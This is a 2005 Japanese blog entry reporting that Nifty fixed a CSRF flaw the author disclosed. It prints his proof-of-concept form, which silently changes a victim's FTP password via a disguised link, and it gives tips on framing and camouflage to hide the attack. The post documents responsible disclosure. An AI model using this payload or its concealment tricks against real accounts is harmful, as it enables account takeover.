水無月ばけらのえび日記

bakera.jp > 水無月ばけらのえび日記 > 2005年のえび日記 > 2005年10月 > 2005年10月30日(日曜日)

2005年10月30日(日曜日)

CSRF 直った

ニフティ系のもろもろがいろいろ直ったという報告がありました。私は退会済みなので確認できませんが、まあ修正報告があったからには大丈夫でしょう。

脆弱性届出状況2005年Q1」あたりで CSRF による強制パスワード変更の可能性について軽く臭わせることを書いていましたが、実際に「@homepage 管理画面において、CSRF 攻撃によって FTP のパスワードが強制変更される」というものを届け出ていたのでした。届出に記載していた PoC コードはこんな感じ。

<form action="https://homepage.nifty.com/cgi-bin/HP_ChangePW.cgi" method="POST">

<p>例の話ですが、ニフティ会員の方は以下で見られます (要パスワード)。</p>

<input type="hidden" name="DISP_PAGE" value="ftp200.htm">

<input type="hidden" name="FTPPASSWD" maxlength="8" size="15" value="XXXXXXXX">

<input type="hidden" name="NEWFTPPASSWD" maxlength="8" size="15" value="XXXXXXXX">

<input type="submit" style="background:transparent;border:none;text-decoration:underline;color:#00f;cursor:hand" value="例の話詳細">

</form>

押すと、Basic 認証のダイアログが出ます (既にログイン済みでなければ、ですが)。そこで素直にパスワードを入れると、パスワード変更完了画面が表示されて後の祭りです。

※まあ、パスワード変更完了画面を見られてしまうとばれてしまうので、本気で攻撃 (!?) する場合には完了画面をうまく隠す必要があるでしょう。フレームを使うなど、カモフラージュの方法はいくらでもあります。

昔ニフティには「インターウェイ」という Web インターフェイスがあって、フォーラムの発言などを Web 上で閲覧することができるようになっていました。そのアクセス制御には Basic 認証が使われていました。そんなわけなので、「ニフティの会員制のコンテンツですよー」と断ってリンクを書いておくと、Basic 認証のダイアログが出てきても不自然さが微塵もないという。

これの他にもいろいろと直ったらしいですね。お疲れ様でした。

関連する話題: セキュリティ / ニフティ / CSRF / 情報セキュリティ早期警戒パートナーシップ

最近の日記

関わった本など